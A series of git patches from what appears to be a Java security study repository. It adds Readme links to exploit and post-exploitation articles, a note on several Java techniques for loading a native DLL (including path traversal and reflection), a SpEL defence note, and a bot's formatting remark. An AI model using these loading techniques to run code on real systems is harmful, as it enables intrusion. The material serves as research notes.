100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -209,3 +209,4 @@ + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** ++ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** From b541642076316d86f83af6f6d42f488f1c764b32 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 8 Dec 2022 20:11:14 +0800 Subject: [PATCH 134/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b72f4c4..0f0f613 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -210,3 +210,4 @@ + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** ++ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** From 85c348b0513fe1f99d7973ed586e888e091229f9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 15:59:18 +0800 Subject: [PATCH 135/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0f0f613..e263195 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -211,3 +211,4 @@ + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** ++ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** From f52b42909225d1b440c6f148ef72292621c2539f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 18:04:45 +0800 Subject: [PATCH 136/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e263195..928f766 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -212,3 +212,4 @@ + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** ++ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* From 7c7bb49024d7f70b43a23688237c1ad0988865e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 21:21:07 +0800 Subject: [PATCH 137/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 928f766..1c3bad2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -213,3 +213,4 @@ + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* ++ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) From 5bf66424673ceb3a8134b54622bb7fe7c813e77c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 14 Dec 2022 00:24:38 +0800 Subject: [PATCH 138/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1c3bad2..2e0bfa2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -214,3 +214,4 @@ + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) ++ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) From a018982d8b362af7684f13d3f5cfe37b94f1adce Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:20:20 +0800 Subject: [PATCH 139/257] Add files via upload --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++ ...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++ 2 files changed, 91 insertions(+) create mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" create mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" 
@@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch (UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); 
+declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file From c8eac49bc4b309dec18aef5f395c6417aa453493 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:11 +0800 Subject: [PATCH 140/257] =?UTF-8?q?Delete=20java=E5=8A=A0=E8=BD=BD?= =?UTF-8?q?=E9=93=BE=E6=8E=A5=E5=BA=93=E7=9A=84=E6=96=B9=E6=B3=95.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 ------------------- 1 file changed, 75 deletions(-) delete mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" 
diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" deleted file mode 100644 index d797145..0000000 --- "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" +++ /dev/null 
@@ -1,75 +0,0 @@ -# java 加载链接库的方法 - -https://tttang.com/archive/1436/ - -1.System.load - -```java -try { - System.load("D:\\temp\\calc_x64.dll"); -}catch (UnsatisfiedLinkError e){ - e.printStackTrace(); -} -``` - -2.Runtime.getRuntime().load - -```java -Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); -``` - -3.com.sun.glass.utils.NativeLibLoader.loadLibrary - -```java -com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); -``` - -有限制 - -1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 -2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 - -4.反射模拟底层调用 - -- 如果模拟ClassLoader加载就会存在两个方案 - - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 -- 如果模拟NativeLibrary就只存在load方法 - -**ClassLoader#loadLibrary** - -```java -try { - Class clazz = Class.forName("java.lang.ClassLoader"); - Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); - method.setAccessible(true); - method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); -}catch (Exception e){ - e.printStackTrace(); -} -``` - -**NativeLibrary#load** - -```java -String file = "D:\\temp\\calc_x64.dll"; -Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); -Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); -con.setAccessible(true); -Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); -Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); -method.setAccessible(true); -method.invoke(obj, file, false); -``` - -```java -String file = "D:\\temp\\calc_x64.dll"; -Class aClass = Class.forName("sun.misc.Unsafe"); -Constructor declaredConstructor = aClass.getDeclaredConstructor(); 
-declaredConstructor.setAccessible(true); -Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); -Object obj = unsafe.allocateInstance(a); -Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); -method.setAccessible(true); -method.invoke(obj, file, false); -``` - From 26ae3d9a4125b1558d52b3565d7ee059f86ea92f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:28 +0800 Subject: [PATCH 141/257] =?UTF-8?q?Delete=20spel=E5=AD=A6=E4=B9=A0?= =?UTF-8?q?=E9=98=B2=E5=BE=A1.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...5\246\344\271\240\351\230\262\345\276\241.md" | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" deleted file mode 100644 index 7eda739..0000000 --- "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" +++ /dev/null @@ -1,16 +0,0 @@ -# spel防御 - -最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 - -官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) - -![image-20220325230922109](img/image-20220325230922109.png) - -SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: - -- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 -- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 - -SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 - -http://rui0.cn/archives/1043 \ No newline at end of file From 07b22ad376e71dcefc1f78afed88ee889f3439d2 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:51 +0800 Subject: [PATCH 142/257] Add files via upload --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++ ...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++ 2 files changed, 91 insertions(+) create mode 100644 "java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" create mode 100644 "java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" 
@@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch (UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); 
+declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file From d37127e0d84b1817af929b23a80b7025c0a01920 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:22:21 +0800 Subject: [PATCH 143/257] Add files via upload --- .../img/image-20220325230922109.png" | Bin 0 -> 14995 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 "java\346\227\245\345\270\270/img/image-20220325230922109.png" 
diff --git "a/java\346\227\245\345\270\270/img/image-20220325230922109.png" "b/java\346\227\245\345\270\270/img/image-20220325230922109.png" new file mode 100644 index 0000000000000000000000000000000000000000..c89682dbeb77ed09f40b9e1aba276300df1066bd GIT binary patch literal 14995
Date: Sat, 17 Dec 2022 17:57:05 +0800 Subject:
[PATCH 144/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2e0bfa2..bb3b049 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -215,3 +215,4 @@ + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) ++ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 From 2c8c93cab4d975230e7fb9c1d809e23496c629cf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 23:59:21 +0800 Subject: [PATCH 145/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bb3b049..4b3831d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -216,3 +216,4 @@ + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 ++ 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** 
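Review bot: In [PATCH 144/257], the added `java.exe和javaw.exe区别` entry leaves its remark (`在bp启动的时候看到了`) as bare trailing text, while the remarks on the neighbouring entries, including the one added in [PATCH 145/257], are wrapped in `**…**`. Wrap it the same way so the list renders consistently, and consider saying what was observed when bp started, since the remark gives no hint why the link is relevant.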
From cf526c6b9e18f7f4b286ef8b676665667e455ac6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 18 Dec 2022 13:04:39 +0800 Subject: [PATCH 146/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4b3831d..f3aa154 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -217,3 +217,4 @@ + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 + 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** ++ 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** From 667d8c3134bfbfec9e8b43ed0adc5921b1a34ec1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 21 Dec 2022 16:12:46 +0800 Subject: [PATCH 147/257] =?UTF-8?q?Create=20jdk17=E7=BB=95=E8=BF=87Module.?= =?UTF-8?q?md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../jdk17\347\273\225\350\277\207Module.md" | 99 +++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 "java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" diff --git "a/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" new file mode 100644 index 0000000..dbd2d4e --- /dev/null +++ "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" 
